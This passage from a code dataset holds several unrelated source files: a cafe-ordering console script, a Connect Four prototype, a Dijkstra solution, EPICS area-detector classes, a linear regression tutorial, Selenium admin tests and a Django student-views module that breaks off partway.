pesanan Anda? 
\"))\r\n if LSqua >= 1:\r\n PesananCair['Lemon Squash'] = LSqua\r\n HargaTotal += 3 * LSqua\r\n Minuman += LSqua\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif DrinkChoice == \"11\":\r\n if 'O (Coffee)' in PesananCair:\r\n HargaTotal -= 2 * OCof \r\n Minuman -= OCof\r\n PesananCair.pop('O (Coffee)') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n OCof = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if OCof >= 1:\r\n PesananCair['O (Coffee)'] = OCof\r\n HargaTotal += 2 * OCof\r\n Minuman += OCof\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n \r\n elif DrinkChoice == \"12\":\r\n if 'Valencia Fizz' in PesananCair:\r\n HargaTotal -= 3 * VFizz \r\n Minuman -= VFizz\r\n PesananCair.pop('Valencia Fizz') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n VFizz = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if VFizz >= 1:\r\n PesananCair['Valencia Fizz'] = VFizz\r\n HargaTotal += 3 * VFizz \r\n Minuman += VFizz\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif DrinkChoice == \"13\":\r\n if 'Electrolyte Drinks' in PesananCair:\r\n HargaTotal -= 7 * EDrink\r\n Minuman -= EDrink\r\n PesananCair.pop('Electrolyte Drinks') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n EDrink = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if EDrink >= 1:\r\n PesananCair['Electrolyte Drinks'] = EDrink\r\n HargaTotal += 7 * EDrink\r\n Minuman += EDrink\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif DrinkChoice.casefold() == \"kembali\" or DrinkChoice == \"0\" :\r\n clear()\r\n break\r\n\r\n else:\r\n print(\"\\n\\033[0;33;40m V: \\\"Hei.. Kami tidak memiliki menu rahasia seperti yang Anda pikirkan..\\\"\\033[0;37;40m\")\r\n input()\r\n clear()\r\n\r\n elif Home == \"3\":\r\n while MenuAwal == 0:\r\n clear()\r\n Banner()\r\n print(\" Daftar Pesanan Anda: \\n\")\r\n for Menu, value in Pesanan.items():\r\n print (\" \", Menu,'sebanyak',value, 'pcs')\r\n for Menu, value in PesananCair.items():\r\n print (\" \", Menu,'sebanyak',value, 'gelas')\r\n GrandFinale = str(input(\"\\n Lanjut ke proses pembayaran (yes/no)? \"))\r\n if GrandFinale.casefold() == \"yes\" or GrandFinale.casefold() == \"ya\" or GrandFinale.casefold() == \"y\":\r\n Emoney = str(input(\"\\n Apa anda ingin membayar dengan e-money(yes/no)? 
\"))\r\n if Emoney.casefold() == \"yes\" or Emoney.casefold() == \"ya\" or Emoney.casefold() == \"y\":\r\n Diskon += 5\r\n print()\r\n elif Emoney.casefold() == \"no\" or Emoney.casefold() == \"tidak\" or Emoney.casefold() == \"n\":\r\n print()\r\n else:\r\n print(\" Menu pembayaran\",Emoney,\"tidak ada, jawaban otomatis: tidak\")\r\n input()\r\n clear()\r\n Banner()\r\n print(\"\\n\\n\")\r\n print(\"|\" * 50)\r\n print(\" Setelah menambahkan diskon: \\n\")\r\n\r\n if Makanan >= 2:\r\n print(\" Diskon pembelian minimal 2 makanan sebesar 5%\")\r\n Diskon += 5\r\n if Minuman >= 3:\r\n print(\" Diskon pembelian minimal 3 minuman sebesar 10%\")\r\n Diskon += 10\r\n if Emoney == \"yes\":\r\n print(\" Diskon penggunaan E-money sebesar 5%\")\r\n if day >= 5:\r\n print(\" Diskon weekend sebesar 5%\")\r\n else:\r\n print(\" Diskon weekdays sebesar 10%\")\r\n print(\"|\" * 50)\r\n\r\n HargaTotal = int(HargaTotal - HargaTotal * Diskon / 100)\r\n print(\"\\n\\n \\033[1;37;41m Harga yang harus Anda bayar: \", HargaTotal, \"Ivory Coins\\033[1;37;40m\")\r\n input()\r\n MenuAwal += 1\r\n break\r\n\r\n elif GrandFinale.casefold() == \"no\" or GrandFinale.casefold() == \"tidak\" or GrandFinale.casefold() == \"n\":\r\n clear()\r\n break\r\n else:\r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik \\\"yes\\\" atau \\\"no\\\"\\\"\\033[0;37;40m\")\r\n input()\r\n\r\n else: \r\n print(\"\\n\\033[0;33;40m V: \\\"Menunya gaada.. (atau belum ada?)\\\"\\033[0;37;40m\")\r\n input()\r\n clear()\r\n","repo_name":"Viabelous/PRAKTIKUM-ALPRO-SMST-1","sub_path":"CafeTime.py","file_name":"CafeTime.py","file_ext":"py","file_size_in_byte":20327,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18774853288","text":"def tableroVacio():\n\treturn [\n\t\t\t[0,0,0,0,0,0,0],\n\t\t\t[0,0,0,0,0,0,0],\n\t\t\t[0,0,0,0,0,0,0],\n\t\t\t[0,0,0,0,0,0,0],\n\t\t\t[0,0,0,0,0,0,0],\n\t\t\t[0,0,0,0,0,0,0],\n\t\t\t]\n\ndef completarTableroEnOrden(secuencia,tablero):\n\tfor i, columna in enumerate(secuencia):\n\t\tif i % 2 :\n\t\t\tfichaNumero = 2 \n\t\telse:\n\t\t\tfichaNumero = 1\n\t\tsoltarFichaEnColumna(fichaNumero, columna, tablero)\n\treturn tablero\n\ndef soltarFichaEnColumna(ficha, columna, tablero):\n\tfor fila in range(6, 0, -1):\n\t\tif tablero [fila - 1] [columna - 1] == 0:\n\t\t\ttablero [fila - 1] [columna - 1] = ficha\n\t\t\treturn\n\ndef marcoTablero(tablero):\t\t\t#Modifique la función anterior (dibujarTablero) para crear marcoTablero y así mostrar una mejor estetica\n\tfor fila in tablero:\n\t\t\tprint(\"║\", end =\" \")\n\t\t\tfor celda in fila:\n\t\t\t\tif celda == 0:\n\t\t\t\t \tprint(' o ', end = '')\n\t\t\t\telse:\n\t\t\t\t\tprint(' %s ' % celda, end = '')\n\t\t\tprint('║')\t\n\tprint(\"╚══════════════════════╝\")\n\ndef secuenciaValida(secuencia):\n\tfor columna in secuencia:\n\t\tif columna < 1 or columna > 7:\n\t\t\treturn False\n\treturn True\n\ndef contenidoColumna(nro_columna, tablero):\n\tcolumna = []\n\tfor fila in tablero:\n\t\tcelda = fila[nro_columna - 1]\n\t\tcolumna.append(celda)\n\treturn columna\n\ndef todasColumnas(tablero):\n\tcolumnas = []\n\tfor i in range(7):\n\t\tcolumna = contenidoColumna((i+1), tablero)\n\t\tcolumnas.append(columna)\n\treturn columnas\n\ndef contenidoFila(nro_fila, tablero):\n fila = tablero[nro_fila-1]\n return fila\n\ndef todasFilas(tablero):\n\treturn tablero\n\nsecuencia_texto = input(\"ingrese la secuencia de numeros\")\nsecuencia = []\nfor items in secuencia_texto.split(','):\n\tsecuencia.append(int(items))\ntablero = 
[]\nif secuenciaValida(secuencia):\n\ttablero = completarTableroEnOrden(secuencia, tableroVacio())\n\tmarcoTablero(tablero)\nelse:\n\tprint(\"Las columnas deberian ir de 1 al 7\")\n\n\n\n\n","repo_name":"Oricasini/4EnLinea2021","sub_path":"Prototipo.py","file_name":"Prototipo.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70445966186","text":"import sys\r\nimport heapq\r\ninput = lambda:sys.stdin.readline().rstrip()\r\nINF = int(1e9)\r\n\r\n#c에서 시작, 최대한 많이 퍼지게, 걸리는 시간\r\nn, m, c = map(int, input().split())\r\ngraph = [[] for i in range(n+1)]\r\ndistance = [INF] * (n+1)\r\n\r\nfor _ in range(m):\r\n x, y, z = map(int, input().split())\r\n graph[x].append((y, z))\r\n\r\ndef dijkstra(start):\r\n q = []\r\n heapq.heappush(q, (0, start))\r\n distance[start] = 0\r\n while q:\r\n dist, now = heapq.heappop(q)\r\n if distance[now] < dist:\r\n continue\r\n\r\n for i in graph[now]:\r\n cost = dist + i[1]\r\n if cost < distance[i[0]]:\r\n distance[i[0]] = cost\r\n heapq.heappush(q, (cost, i[0]))\r\n\r\ndijkstra(c)\r\nprint(distance)\r\ncnt = 0\r\ncost = 0\r\nfor i in distance:\r\n if i != INF:\r\n cnt += 1\r\n if i > cost:\r\n cost = i\r\n\r\nprint(cnt-1, cost)\r\n\r\n#플로이드 워셜 알고리즘으로 풀어본건데 이게 맞는지는 알수 없음....\r\n'''\r\n#c에서 시작, 최대한 많이 퍼지게, 걸리는 시간\r\nn, m, c = map(int, input().split())\r\ngraph = [[INF] * (n+1) for _ in range(n+1)]\r\n\r\nfor _ in range(m):\r\n x, y, z = map(int, input().split())\r\n graph[x][y] = z\r\n\r\nfor a in range(1, n+1):\r\n for b in range(1, n+1):\r\n if a == b:\r\n graph[a][b] = 0\r\n\r\nfor k in range(1, n+1):\r\n for a in range(1, n+1):\r\n for b in range(1, n+1):\r\n graph[a][b] = min(graph[a][b], graph[a][k] + graph[k][b])\r\n\r\ncnt = 0\r\nfor i in range(1, n+1):\r\n if graph[c][i] != INF and i != c:\r\n cnt += 1\r\n\r\nprint(cnt, max(graph[c]))\r\n'''","repo_name":"kdozlo/algorithm-study-Python","sub_path":"algorithm_study/thisispython_part2/p263.py","file_name":"p263.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34662897129","text":"import time\nimport numpy\nimport threading\nfrom ophyd import select_version, Component, EpicsSignalRO, \\\n\tEpicsSignal, ADBase, ADComponent, EpicsSignalWithRBV, \\\n\tDetectorBase, CamBase, HDF5Plugin, ADTriggerStatus\nfrom ophyd.device import BlueskyInterface, Staged\nfrom ophyd.signal import AttributeSignal\nfrom ophyd.areadetector.plugins import PluginBase\nfrom ophyd.areadetector.filestore_mixins import \\\n\tFileStoreHDF5, FileStoreIterativeWrite\nfrom ophyd.utils.errors import UnprimedPlugin\nfrom .ophyd import ThrottleMonitor\n\nMyHDF5Plugin = select_version(HDF5Plugin, (3, 15))\n\nclass MyTriggerBase(BlueskyInterface):\n\t_status_type = ADTriggerStatus\n\n\tdef __init__(self, *args, image_name = None, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\t\tif image_name is None:\n\t\t\timage_name = \"_\".join([self.name, \"image\"])\n\t\tself._image_name, self._datum_keys = image_name, [image_name]\n\nclass SoftTrigger(MyTriggerBase):\n\t_acquisition_signal = \"cam.acquire\"\n\t_counter_signal = _orig_acquire = _status = None\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\t\tif self._acquisition_signal:\n\t\t\tself._acquisition_signal = getattr(self, self._acquisition_signal)\n\t\tif self._counter_signal:\n\t\t\tself._counter_signal = getattr(self, 
self._counter_signal)\n\t\tself.stage_sigs.update([(\"cam.acquire\",\n\t\t\t0 if self._acquisition_signal == self.cam.acquire else 1)])\n\n\tdef stage(self):\n\t\tself._orig_acquire = self.cam.acquire.get()\n\t\tif self._orig_acquire == self.stage_sigs[\"cam.acquire\"] == 1:\n\t\t\tself.cam.acquire.put(0)\n\t\t(self._counter_signal or self._acquisition_signal)\\\n\t\t\t.subscribe(self._acquire_changed)\n\t\tsuper().stage()\n\n\tdef unstage(self):\n\t\tsuper().unstage()\n\t\t(self._counter_signal or self._acquisition_signal)\\\n\t\t\t.clear_sub(self._acquire_changed)\n\t\tif self._orig_acquire == self.stage_sigs[\"cam.acquire\"] == 1:\n\t\t\tself.cam.acquire.put(1)\n\n\tdef trigger(self):\n\t\tassert self._staged == Staged.yes\n\t\tself._status = self._status_type(self)\n\t\tself._acquisition_signal.put(1)\n\t\tself.dispatch(self._image_name, time.time())\n\t\treturn self._status\n\n\tdef _acquire_changed(self, *, value, old_value, **kwargs):\n\t\tif self._status is None:\n\t\t\treturn\n\t\tif self._counter_signal or (old_value == 1 and value == 0):\n\t\t\tstatus, self._status = self._status, None\n\t\t\tstatus.set_finished()\n\nclass DxpTrigger(MyTriggerBase):\n\t_started, _unstage_time = False, 0.2\n\n\tdef stage(self):\n\t\tsuper().stage()\n\t\tself._started = False\n\n\tdef unstage(self):\n\t\tif self._started:\n\t\t\tself.cam.next_pixel.put(1)\n\t\t\ttime.sleep(self._unstage_time)\n\t\t\tself.cam.stop_all.put(1)\n\t\t\tif not self.cam.wait_acquiring(False):\n\t\t\t\tsuper().unstage()\n\t\t\t\traise TimeoutError\\\n\t\t\t\t\t(\"Timeout waiting for %r to be low\" % self.cam.acquiring)\n\t\t\tself._started = False\n\t\tsuper().unstage()\n\n\tdef wait_finish(self):\n\t\tpixels = self.cam.pixels_per_run.get()\n\t\tif pixels > 0 or not self._started:\n\t\t\tif pixels <= 0:\n\t\t\t\tself._started = True\n\t\t\tself.cam.erase_start.put(1)\n\t\t\tif not self.cam.wait_acquiring(True):\n\t\t\t\traise TimeoutError\\\n\t\t\t\t\t(\"Timeout waiting for %r to be high\" % self.cam.acquiring)\n\t\telse:\n\t\t\tself.cam.next_pixel.put(1)\n\t\tif pixels > 0:\n\t\t\tfor i in range(pixels):\n\t\t\t\ttime.sleep(self.cam.preset_real.get())\n\t\t\t\tself.cam.next_pixel.put(1)\n\t\telse:\n\t\t\ttime.sleep(self.cam.preset_real.get())\n\t\tif pixels > 0 and not self.cam.wait_acquiring(False):\n\t\t\tself.cam.stop_all.put(1)\n\t\t\traise TimeoutError\\\n\t\t\t\t(\"Timeout waiting for %r to be low\" % self.cam.acquiring)\n\n\tdef trigger(self):\n\t\tassert self._staged == Staged.yes\n\t\tstatus = self._status_type(self)\n\t\tself.dispatch(self._image_name, time.time())\n\t\tdef wait():\n\t\t\ttry:\n\t\t\t\tself.wait_finish()\n\t\t\texcept Exception as exc:\n\t\t\t\tstatus.set_exception(exc)\n\t\t\t\traise\n\t\t\tstatus.set_finished()\n\t\tthreading.Thread(target = wait, daemon = True).start()\n\t\treturn status\n\nclass DxpDetectorBase(DetectorBase):\n\tmake_data_key = lambda self: dict(\n\t\tshape = (1,) + tuple(self.hdf1.array_size.get())[-2:],\n\t\tsource = \"PV.\" + self.prefix, dtype = \"array\", external = \"FILESTORE:\"\n\t)\n\nclass CptHDF5(MyHDF5Plugin, FileStoreHDF5, FileStoreIterativeWrite):\n\tget_frames_per_point = lambda self: self.parent.cam.num_images.get()\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\t\tself.filestore_spec = \"AD_HDF5_SWMR\"\n\n\tdef warmup(self):\n\t\tself.enable.set(1).wait()\n\t\tself.swmr_mode.set(1).wait()\n\nclass CptHDF5Dxp(CptHDF5):\n\tdef get_frames_per_point(self):\n\t\treturn max(self.parent.cam.pixels_per_run.get(), 1)\n\nclass 
MyImagePlugin(ThrottleMonitor, PluginBase):\n\t_plugin_type = \"NDPluginStdArrays\"\n\tarray_data = Component(EpicsSignalRO, \"ArrayData\", auto_monitor = True)\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\t\tself.disable_on_stage()\n\t\tself.ensure_nonblocking()\n\n\tdef monitor(self, dnotify):\n\t\timage_name, _timestamp = self.parent._image_name, [0.0]\n\t\tdef cb(*, value, timestamp, **kwargs):\n\t\t\tif value is None or not self.maybe_monitor(_timestamp, timestamp):\n\t\t\t\treturn\n\t\t\tshape = list(self.array_size.get())\n\t\t\twhile True:\n\t\t\t\tif not shape:\n\t\t\t\t\treturn\n\t\t\t\tif all(shape):\n\t\t\t\t\tbreak\n\t\t\t\tshape.pop(0)\n\t\t\tdnotify(\"monitor/image\", {\n\t\t\t\t\"data\": {image_name: value[:numpy.prod(shape)].reshape(shape)},\n\t\t\t\t\"timestamps\": {image_name: timestamp}\n\t\t\t})\n\t\treturn self.array_data.subscribe(cb, run = False)\n\nclass MyCam(CamBase):\n\tdef warmup(self, sleep = 2.0):\n\t\tsigs = [(self.array_callbacks, 1), (self.acquire, 1)]\n\t\torig_vals = [(sig, sig.get()) for sig, val in sigs]\n\n\t\tfor sig, val in sigs:\n\t\t\ttime.sleep(0.1)\n\t\t\tsig.put(val)\n\t\tif sleep > 0:\n\t\t\ttime.sleep(sleep)\n\t\telse:\n\t\t\tfor i in range(100):\n\t\t\t\tif not self.acquire.get():\n\t\t\t\t\tbreak\n\t\t\t\ttime.sleep(0.1)\n\t\tfor sig, val in reversed(orig_vals):\n\t\t\tsig.set(val).wait()\n\nclass DxpCam(ADBase):\n\t_default_configuration_attrs = ADBase._default_configuration_attrs + (\n\t\t\"collect_mode\", \"ignore_gate\", \"input_logic_polarity\",\n\t\t\"pixel_advance_mode\", \"pixels_per_run\", \"pixels_per_buffer\",\n\t\t\"auto_pixels_per_buffer\", \"preset_mode\", \"preset_real\"\n\t)\n\n\tport_name = ADComponent(EpicsSignalRO, \"Asyn.PORT\", string = True)\n\tcollect_mode = ADComponent(EpicsSignalWithRBV, \"CollectMode\")\n\tignore_gate = ADComponent(EpicsSignalWithRBV, \"IgnoreGate\")\n\tinput_logic_polarity = ADComponent(EpicsSignalWithRBV, \"InputLogicPolarity\")\n\tpixel_advance_mode = ADComponent(EpicsSignalWithRBV, \"PixelAdvanceMode\")\n\tpixels_per_run = ADComponent(EpicsSignalWithRBV, \"PixelsPerRun\")\n\tpixels_per_buffer = ADComponent(EpicsSignalWithRBV, \"PixelsPerBuffer\")\n\tauto_pixels_per_buffer = \\\n\t\tADComponent(EpicsSignalWithRBV, \"AutoPixelsPerBuffer\")\n\tpreset_mode = ADComponent(EpicsSignal, \"PresetMode\")\n\tpreset_real = ADComponent(EpicsSignal, \"PresetReal\")\n\terase_start = ADComponent(EpicsSignal, \"EraseStart\")\n\tstop_all = ADComponent(EpicsSignal, \"StopAll\")\n\tnext_pixel = ADComponent(EpicsSignal, \"NextPixel\")\n\tacquiring = ADComponent(EpicsSignal, \"Acquiring\")\n\n\tdef wait_acquiring(self, val):\n\t\tfor i in range(100):\n\t\t\tif bool(self.acquiring.get()) == bool(val):\n\t\t\t\treturn True\n\t\t\ttime.sleep(0.1)\n\t\telse:\n\t\t\treturn False\n\n\tdef warmup(self):\n\t\tself.erase_start.put(1)\n\t\tself.wait_acquiring(True)\n\t\tself.next_pixel.put(1)\n\t\tself.wait_acquiring(False)\n\t\tself.stop_all.put(1)\n\nclass SitoroCam(DxpCam):\n\t_default_configuration_attrs = \\\n\t\tDxpCam._default_configuration_attrs + (\"ndarray_mode\",)\n\tndarray_mode = ADComponent(EpicsSignalWithRBV, \"NDArrayMode\")\n\ndef make_detector(name, inherit = None, **kwargs):\n\tif not inherit:\n\t\tinherit = (SoftTrigger, DetectorBase)\n\tdef warmup(obj):\n\t\tobj.hdf1.warmup()\n\t\tobj.cam.warmup()\n\t\tif not sum(obj.hdf1.array_size.get()):\n\t\t\traise UnprimedPlugin(\"%s failed to warm up\" % obj.hdf1.vname())\n\tdef monitor(obj, dnotify):\n\t\treturn 
obj.image1.monitor(dnotify)\n\tattrs = {\n\t\t\"_default_read_attrs\": [\"hdf1\"],\n\t\t\"cam\": Component(MyCam, \"cam1:\"),\n\t\t\"hdf1\": Component(CptHDF5, \"HDF1:\", write_path_template = \"/\"),\n\t\t\"image1\": Component(MyImagePlugin, \"image1:\"),\n\t\t\"warmup\": warmup, \"monitor\": monitor\n\t}\n\tfor k, v in kwargs.items():\n\t\tif v is None:\n\t\t\tattrs.pop(k, None)\n\t\telse:\n\t\t\tattrs[k] = v\n\treturn type(name, inherit, attrs)\n\nMyAreaDetector = make_detector(\"MyAreaDetector\")\nBaseAreaDetector = make_detector\\\n\t(\"BaseAreaDetector\", image1 = None, monitor = None)\nDxpDetector, SitoroDetector = [make_detector(\n\tname, (DxpTrigger, DxpDetectorBase), cam = Component(cam, \"\"),\n\thdf1 = Component(CptHDF5Dxp, \"HDF1:\", write_path_template = \"/\"),\n\timage1 = None, monitor = None\n) for name, cam in [(\"DxpDetector\", DxpCam), (\"SitoroDetector\", SitoroCam)]]\n\n","repo_name":"CasperVector/mamba-ose","sub_path":"butils/ad.py","file_name":"ad.py","file_ext":"py","file_size_in_byte":8463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10819016892","text":"# Import pandas, numpy, matplotlib,and seaborn. Then set %matplotlib inline \nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as py\nimport seaborn as sns\n\n\n# Read in the Ecommerce Customers csv file as a DataFrame called customers.\ncustomers = pd.read_csv(\"Ecommerce Customers\")\n\n# Check the head of customers, and check out its info() and describe() methods.\ncustomers.head()\ncustomers.info()\ncustomers.describe()\n\n# Exploratory Data Analysis\n\n# Use seaborn to create a jointplot to compare the Time on Website and Yearly Amount Spent columns. Does the correlation make sense?\nsns.jointplot(x='Time on Website',y='Yearly Amount Spent', data=customers)\n\n#Do the same but with the Time on App column instead.\nsns.jointplot(x='Time on App',y='Yearly Amount Spent', data=customers)\n\n#Use jointplot to create a 2D hex bin plot comparing Time on App and Length of Membership.\nsns.jointplot(x='Time on App',y='Length of Membership', data=customers,kind='hex')\n\n# Let's explore these types of relationships across the entire data set. Use pairplot to recreate the plot below.\nsns.pairplot(data=customers)\n\n# Based off this plot what looks to be the most correlated feature with Yearly Amount Spent?\n# Length of Membership\n\n# Create a linear model plot (using seaborn's lmplot) of Yearly Amount Spent vs. Length of Membership.\nsns.lmplot(x='Length of Membership',y='Yearly Amount Spent',data=customers)\n\n# Training and Testing Data\n\n# Now that we've explored the data a bit, let's go ahead and split the data into training and testing sets. Set a variable X equal to the numerical features of the customers and a variable y equal to the \"Yearly Amount Spent\" column\nX =customers[['Avg. Session Length','Time on App','Time on Website','Length of Membership']]\nX.head()\nY=customers['Yearly Amount Spent']\nY.head()\n\n# Use model_selection.train_test_split from sklearn to split the data into training and testing sets. Set test_size=0.3 and random_state=101\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, Y_train, Y_test = train_test_split(X,Y, test_size=0.3,random_state=101)\n\n#Training the Model\n\n# Now its time to train our model on our training data! 
Import LinearRegression from sklearn.linear_model\nfrom sklearn.linear_model import LinearRegression\n\n# Create an instance of a LinearRegression() model named lm.\nlm = LinearRegression()\n\n# Train/fit lm on the training data.\nlm.fit(X_train,Y_train)\n\n#Print out the coefficients of the model\nprint(lm.coef_)\n\n# Predicting Test Data\n\n# Now that we have fit our model, let's evaluate its performance by predicting off the test values! Use lm.predict() to predict off the X_test set of the data.\nprediction = lm.predict(X_test)\n\n# Create a scatterplot of the real test values versus the predicted values.\npy.scatter(Y_test,prediction)\n\n# Evaluating the Model\n\n# Let's evaluate our model performance by calculating the residual sum of squares and the explained variance score (R^2).Calculate the Mean Absolute Error, Mean Squared Error, and the Root Mean Squared Error.\nfrom sklearn import metrics\nprint('MAE= ', metrics.mean_absolute_error(Y_test,prediction) )\nprint('MSE= ', metrics.mean_squared_error(Y_test,prediction))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(Y_test, prediction)))\n\n# Residuals\n\n# Let's quickly explore the residuals to make sure everything was okay with our data. Plot a histogram of the residuals and make sure it looks normally distributed. Using plt.hist()\npy.hist(prediction-Y_test,bins=50)\n\n# Conclusion\n\n# do we focus our efforst on mobile app or website development\ncoeffecients = pd.DataFrame(lm.coef_,X.columns)\ncoeffecients.columns = ['Coeffecient']\ncoeffecients\n\n# How can you interpret these coefficients?\n\n# Interpreting the coefficients:\n\n# Holding all other features fixed, a 1 unit increase in Avg. Session Length is associated with an increase of 25.98 total dollars spent.\n# Holding all other features fixed, a 1 unit increase in Time on App is associated with an increase of 38.59 total dollars spent.\n# Holding all other features fixed, a 1 unit increase in Time on Website is associated with an increase of 0.19 total dollars spent.\n# Holding all other features fixed, a 1 unit increase in Length of Membership is associated with an increase of 61.27 total dollars spent.\n# Do you think the company should focus more on their mobile app or on their website?\n\n# There are two ways to think about this: Develop the Website to catch up to the performance of the mobile app, or develop the app more since that is what is working better!!\n","repo_name":"surmayi/DataScience","sub_path":"LinearRegression.py","file_name":"LinearRegression.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16118155274","text":"from positions.shops_manage import Shops_Manage\nfrom time import sleep\nfrom test_case.mytest import MyTest\nfrom positions.login import login_operate\nfrom positions.home_page import Home_page\n\nclass shops_manage(MyTest):\n def test_shops_check_in(self):\n \"\"\"验证商家入驻\"\"\"\n ha = login_operate(self.driver)\n ha.open() ###打开浏览器\n ha.log_in()\n sleep(1.5)\n # ha.screen_shot()\n ha.Get(\"ShopDetail/0/edit\")\n hb = Shops_Manage(self.driver)\n hb.Create_account()\n hb.Shops_id()\n hb.Shops_password()\n hb.Shops_num()\n hb.Shops_name()\n hb.Shop_name()\n hb.Shops_logo()\n hb.Key_word()\n hb.Shops_photo()\n hb.Business_license()\n hb.Company_name()\n hb.Company_certifyNO()\n hb.Company_certifyName()\n hb.Company_identityNo()\n hb.Bank()\n hb.Bank_companyName()\n hb.Bank_blankNo()\n hb.Bank_blankName()\n hb.Other()\n sleep(1.5)\n 
hb.Shop_grade()\n hb.Merchant_companyGrade()\n sleep(1.5)\n hb.Shop_class()\n hb.Merchant_companyType()\n sleep(1.5)\n hb.Submit()\n sleep(1)\n\n def test_placeholder_query(self):\n \"\"\"验证商家ID查询\"\"\"\n ha = login_operate(self.driver)\n ha.open() ###打开浏览器\n ha.log_in()\n sleep(1.5)\n ha.Get(\"Shop\")\n hb = Shops_Manage(self.driver)\n obj=hb.Text_Value(2)\n hb.Placeholder(obj)\n hb.Query()\n sleep(1)\n if hb.Shop_nu()[0]>0:\n mur=hb.Text_Value(2)\n self.assertEqual(obj,mur)\n else:\n raise Exception('查询无数据')\n\n def test_shop_ID_query(self):\n \"\"\"验证商家ID查询\"\"\"\n ha = login_operate(self.driver)\n ha.open() ###打开浏览器\n ha.log_in()\n sleep(1.5)\n ha.Get(\"Shop\")\n hb = Shops_Manage(self.driver)\n obj=hb.Text_Value(3)\n hb.Placeholder(obj)\n hb.Query()\n sleep(1)\n if hb.Shop_nu()[0]>0:\n mur=hb.Text_Value(3)\n self.assertEqual(obj,mur)\n else:\n raise Exception('查询无数据')\n\n def test_store_name(self):\n \"\"\"验证商家名称查询\"\"\"\n ha = login_operate(self.driver)\n ha.open() ###打开浏览器\n ha.log_in()\n sleep(1.5)\n ha.Get(\"Shop\")\n hb = Shops_Manage(self.driver)\n obj = hb.Text_Value(4)\n hb.Store_name(obj)\n hb.Query()\n sleep(1)\n if hb.Shop_nu()[0] > 0:\n mur = hb.Text_Value(4)\n self.assertEqual(obj, mur)\n else:\n raise Exception('查询无数据')\n\n def test_store_grade(self):\n \"\"\"验证商家等级查询\"\"\"\n ha = login_operate(self.driver)\n ha.open() ###打开浏览器\n ha.log_in()\n sleep(1.5)\n ha.Get(\"Shop\")\n hb = Shops_Manage(self.driver)\n sleep(1)\n obj = hb.Store_grade()\n hb.Query()\n sleep(1)\n if hb.Shop_nu()[0] > 0:\n mur = hb.Text_Value(5)\n self.assertEqual(obj, mur)\n else:\n raise Exception('查询无数据')\n\n\n def test_store_Recharge(self):\n \"\"\"验证商家充值\"\"\"\n ha = login_operate(self.driver)\n ha.open() ###打开浏览器\n ha.log_in()\n sleep(1.5)\n ha.Get(\"Shop\")\n hb = Shops_Manage(self.driver)\n mur=hb.Remain_sum_and_recharge()\n n=hb.Recharge_money()\n hb.Recharge_Confirm_or_Cancel()\n sleep(1.5)\n obj=hb.text_Remain(mur[0])\n self.assertEqual(str(int(mur[1])+n),str(obj))\n sleep(10)\n\n","repo_name":"SXL5519/Operating_background_test_01","sub_path":"test_case/case_shops.py","file_name":"case_shops.py","file_ext":"py","file_size_in_byte":3722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"43277686391","text":"from django.shortcuts import render\nfrom .models import Student, Registration\nfrom django.views.generic import ListView, DetailView\nfrom django.db import connection\nfrom django.http import HttpResponse\n\n\ndef testmysql(request):\n return render(request, 'home.html')\n\n\n# StudentList class should be deleted later on.\nclass StudentList(ListView):\n template_name = 'student/student_list.html'\n model = Student\n\n\n# Student home page.\nclass StudentHome(DetailView):\n template_name = 'student/student_home.html'\n model = Student\n\n\n# Student main page after logging in.\n\n\nclass StudentDetails(DetailView):\n template_name = 'student/student_profile.html'\n model = Student\n\n\ndef getStudentNotification(request, student_id):\n res = {\n 'student_id': int(student_id),\n 'pending_list': [],\n }\n\n for r in getPendingApprovals(student_id):\n res['pending_list'].append({'course_num': r, 'course_name': getNameByCourseNum(r),\n 'status': 'Pending for approval'})\n\n context = {\n \"data\": res\n }\n\n return render(request, 'student/student_notification.html', context)\n\n\ndef dropCourse(request, student_id):\n cursor = connection.cursor()\n course_currently_taking = getCourseCurrentlyTakingOrPending(student_id)\n if 
